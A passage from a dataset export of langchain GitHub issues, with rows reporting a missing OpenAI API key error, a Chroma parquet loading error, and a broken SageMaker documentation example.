).from_loaders([loader])
result = index.query(llm=model,qustion=query,chain_type="refine")
```
### Expected behavior
Dont show any openai error | Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass `openai_api_key` as a named parameter. (type=value_error) | https://api.github.com/repos/langchain-ai/langchain/issues/7189/comments | 11 | 2023-07-05T10:43:47Z | 2024-04-12T15:07:16Z | https://github.com/langchain-ai/langchain/issues/7189 | 1,789,283,892 | 7,189 |
[
"langchain-ai",
"langchain"
] | ### System Info
Python 3.11.4
duckdb==0.8.1
chromadb==0.3.26
langchain==0.0.221
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I persisted my Chroma database in a EC2 instance, where I have all these files:
chroma-collections.parquet
chroma-embeddings.parquet
index/
I download these files for testing the database in my local machine, but I got the error:
> Invalid Input Error: No magic bytes found at end of file 'database/vectors/chroma-embeddings.parquet'
When I tried to:
```
from langchain.vectorstores import Chroma
db = Chroma(embedding_function=embedding_function,
persist_directory=persist_directory,
collection_name=collection_name)
```
Can I download these persisted files and test them on another machine?
### Expected behavior
To read all the embeddings | Load Chroma database: Invalid Input Error: No magic bytes found at end of file 'database/vectors/chroma-embeddings.parquet' | https://api.github.com/repos/langchain-ai/langchain/issues/7188/comments | 2 | 2023-07-05T10:33:28Z | 2023-10-12T16:06:41Z | https://github.com/langchain-ai/langchain/issues/7188 | 1,789,266,410 | 7,188 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
https://python.langchain.com/docs/modules/model_io/models/llms/integrations/sagemaker
This example is not working. I've just copy pasted the code from here and ran it in my notebook instance. I'm using falcon-40b-instruct model.
The error I'm getting is as follows
Error raised by inference endpoint: An error occurred (ModelError) when calling the InvokeEndpoint operation: Received client error (422) from primary with message "Failed to deserialize the JSON body into the target type: missing field `inputs` at line 1 column 509".
### Idea or request for content:
_No response_ | DOC: https://python.langchain.com/docs/modules/model_io/models/llms/integrations/sagemaker | https://api.github.com/repos/langchain-ai/langchain/issues/7187/comments | 4 | 2023-07-05T10:10:48Z | 2024-02-10T16:22:12Z | https://github.com/langchain-ai/langchain/issues/7187 | 1,789,229,545 | 7,187 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.